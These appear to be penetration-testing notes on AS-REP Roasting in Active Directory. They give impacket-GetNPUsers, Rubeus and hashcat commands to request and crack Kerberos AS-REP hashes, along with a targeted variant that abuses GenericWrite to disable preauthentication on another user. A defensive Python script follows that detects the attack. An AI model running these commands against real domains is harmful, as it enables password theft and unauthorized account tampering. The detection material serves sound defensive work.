AS-REP Roasting is an attack against a misconfiguration in Kerberos where preauthentication is disabled for a user. Without preauthentication, an attacker can request an AS-REP (Authentication Service Response) from the domain controller for that user. The AS-REP contains data encrypted with the user's password hash, allowing the attacker to perform an offline brute-force attack to crack the hash and potentially obtain the user's password.
This can be done from Kali Linux as well as from Windows.
Initial Step: Identification
# To identify users with the "Do not require Kerberos preauthentication" option enabled using impacket-GetNPUsers on Kali Linux:
impacket-GetNPUsers <domain>/'<username>':'<password>' -dc-ip <domain-controller-ip>
Type 1: Using Kali Linux:
# Fetch the hash and store it.
impacket-GetNPUsers -dc-ip $DC_IP -request -outputfile hashes.asreproast <domainName>/<Username>:<password>
# Crack it with the command below (mode 18200 is Kerberos 5 AS-REP etype 23).
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Let's assume that we are conducting an assessment in which we cannot identify any AD users with the account option Do not require Kerberos preauthentication enabled. While enumerating, we notice that we have GenericWrite or GenericAll permissions on another AD user account. Using these permissions, we could reset their passwords, but this would lock out the user from accessing the account. We could also leverage these permissions to modify the User Account Control value of the user to not require Kerberos preauthentication. This attack is known as Targeted AS-REP Roasting. Notably, we should reset the User Account Control value of the user once we've obtained the hash.
# Transfer Rubeus.exe to the victim machine (find it on Kali first).
locate Rubeus.exe
.\Rubeus.exe asreproast /nowrap /outfile:hashes.asreproast
# Save the hash on Kali Linux and crack it using hashcat.
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
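From the defender's side, the identification step above and the targeted variant (flipping and later resetting the user's UAC flag) both leave checkable traces. The following is an added example, not part of the original notes: it audits a directory export for the DONT_REQ_PREAUTH bit (0x400000 in userAccountControl), flags Security event 4768 records issued with Pre-Authentication Type 0, and cross-checks the two so a user who received an AS-REP without pre-auth but whose flag is currently clear stands out as a possible targeted roast. The account list and event records are constructed sample data; the field names follow the 4768 event schema.

```python
"""Defensive checks for AS-REP Roasting: audit the UAC flag and spot pre-auth-less TGT requests."""
from collections import Counter

DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit: "Do not require Kerberos preauthentication"
NO_PREAUTH = 0               # 4768 PreAuthType 0: the AS-REP was issued without pre-authentication
RC4_HMAC = 0x17              # 4768 TicketEncryptionType for RC4-HMAC, the hashcat -m 18200 case

# Constructed sample directory export (not real accounts): sAMAccountName -> userAccountControl.
ACCOUNTS = {
    "alice": 0x10200,                          # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    "svc_backup": 0x10200 | DONT_REQ_PREAUTH,  # misconfigured: roastable right now
    "bob": 0x200,                              # flag currently clear
}

# Constructed sample Security event 4768 (TGT requested) records; field names follow the event schema.
EVENTS_4768 = [
    {"TargetUserName": "alice", "IpAddress": "10.0.0.5", "PreAuthType": 2, "TicketEncryptionType": 0x12},
    {"TargetUserName": "svc_backup", "IpAddress": "10.0.0.77", "PreAuthType": 0, "TicketEncryptionType": 0x17},
    {"TargetUserName": "bob", "IpAddress": "10.0.0.77", "PreAuthType": 0, "TicketEncryptionType": 0x17},
]


def roastable_accounts(accounts):
    """Accounts whose UAC has DONT_REQ_PREAUTH set: the audit-side view of the identification step."""
    return sorted(name for name, uac in accounts.items() if uac & DONT_REQ_PREAUTH)


def asrep_requests(events):
    """4768 records issued without pre-auth; rc4=True marks tickets crackable with hashcat -m 18200."""
    return [
        {"user": ev["TargetUserName"], "source": ev["IpAddress"], "rc4": ev["TicketEncryptionType"] == RC4_HMAC}
        for ev in events
        if ev["PreAuthType"] == NO_PREAUTH
    ]


def noisy_sources(hits, threshold=2):
    """One source pulling AS-REPs for several pre-auth-less users matches a bulk GetNPUsers -request run."""
    counts = Counter(h["source"] for h in hits)
    return sorted(src for src, n in counts.items() if n >= threshold)


def suspected_targeted(hits, accounts):
    """Users roasted without the flag being set now: consistent with a flag flipped and reset afterwards."""
    return sorted({h["user"] for h in hits if not (accounts.get(h["user"], 0) & DONT_REQ_PREAUTH)})


if __name__ == "__main__":
    print("accounts to fix:", roastable_accounts(ACCOUNTS))
    hits = asrep_requests(EVENTS_4768)
    print("AS-REP requests without pre-auth:", hits)
    print("sources to investigate:", noisy_sources(hits))
    print("possible targeted roast:", suspected_targeted(hits, ACCOUNTS))
```

Pair the 4768 check with a watch on user-account-changed events for the same flag, since the targeted variant's window between set and reset can be short.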